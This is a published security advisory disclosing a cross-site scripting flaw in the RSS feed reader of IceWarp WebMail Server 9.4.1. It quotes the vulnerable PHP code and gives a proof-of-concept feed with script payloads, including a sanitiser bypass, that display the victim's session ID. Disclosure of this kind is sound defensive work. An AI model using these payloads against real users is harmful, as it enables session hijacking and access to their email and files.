Advisory: IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to user-assisted Cross Site Scripting attacks in its RSS feed reader. If attackers control or compromise an RSS feed users are subscribed to, they can run arbitrary JavaScript code in the users' browsers by embedding it within the feed. Details ======= Product: IceWarp eMail Server / WebMail Server Affected Versions: 9.4.1 Fixed Versions: 9.4.2 Vulnerability Type: Cross Site Scripting Security Risk: medium Vendor URL: http://www.icewarp.com/ Vendor Status: notified, fixed version released Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-002 Advisory Status: published CVE: CVE-2009-1467 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1467 Introduction ============ "Feature complete yet easy to use, WebMail Server Pro provides feature rich Web 2.0 web-based access to email, calendars, contacts, files and shared data from any computer with browser and internet connection, without the usual configuration hassle. Thanks to advanced technologies and application-like look and feel, Pro suggests it was born to become the ultimate replacement of Outlook and similar desktop mail clients." (from the vendor's homepage) More Details ============ Users of the IceWarp WebMail Server can add RSS feeds as folders to their folder list. The parsing of such feeds is done in the PHP file html/webmail/server/inc/rss/rss.php The individual items of an RSS channel are handled in html/webmail/server/inc/rss/item.php In the function getHTML(), the final HTML page for an item is assembled and returned. The "title" and "description" keys correspond to the <title> and <description> elements in the feed, the "href" key to the <link> element: ------------------------------------------------------------------------ 159 public function getHTML(&$aItem) 160 { 161 $aHTML['title'] = $this->subject; 162 $aHTML['href'] = $this->to; 163 $aHTML['description'] = Tools::cleanHTML($this->body,$base); 164 165 $aURL = parse_url($this->to); 166 $aItem['base'] = $aURL['host']; 167 168 @$sHTML = htmlspecialchars( template('inc/templates/rss.tpl',$aHTML) ); 169 170 return $sHTML; 171 } ------------------------------------------------------------------------ Only the description gets sanitised by the cleanHTML() function, "title" and "href" are embedded unmodified into the final HTML page. This means that HTML or JavaScript code embedded in an item's <title> or <link> element of an RSS feed users are subscribed to will be executed as soon as they click on the item to display it. HTML and JavaScript code within the <description> element of an item is sanitised, but the sanitisation can be bypassed in the same way as described in RedTeam Pentesting's advisory rt-sa-2009-001, "IceWarp WebMail Server: Cross Site Scripting in Email View". Attackers have two options for exploiting this vulnerability: First, they can embed malicious code in a feed they control and convince users to subscribe to this feed. Second, they can change RSS feeds the users are already subscribed to by exploiting vulnerabilities in the systems providing these feeds. Proof of Concept ================ The following RSS feed contains JavaScript code in the <title> and <description> elements that displays a message containing the user's session ID. This code gets executed when users click on the item to view it: ------------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <rss version="2.0"> <channel> <title>RedTeam Pentesting</title> <link href="http://www.redteam-pentesting.de" rel="self" type="application/rss+xml" /> <link>http://www.redteam-pentesting.de</link> <description>Seeing your network from the attacker's perspective</description> <pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate> <language>de</language> <item> <title><script>alert('Title: Your session id is: ' + window.top.sSID);</script></title> <link>http://www.redteam-pentesting.de/pentest</link> <pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate> <description> <div o<xml>nmouseover="alert('Description: Your session id is: ' + window.top.sSID)"> RedTeam Pentesting XSS </div> </description> </item> </channel> </rss> ------------------------------------------------------------------------ Workaround ========== None. Fix === Upgrade to version 9.4.2. Security Risk ============= Attackers who can inject JavaScript code into RSS feeds that users are subscribed to, or who can get users to subscribe to such RSS feeds, can execute any JavaScript code on the users' behalf. This will let them control the web application on a victim user's behalf and access any information accessible to that user, for example emails and files. It can also be used to to steal the users' sessions and hijack their accounts. Therefore the risk is estimated as medium. History ======= 2009-03-23 Vulnerabilities identified during a penetration test 2009-04-01 Meeting with customer and vendor 2009-04-28 CVE number assigned 2009-05-05 Vendor publishes fixed version 2009-05-05 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck
Attachment:
pgpjeHdcx1CfE.pgp
Description: PGP signature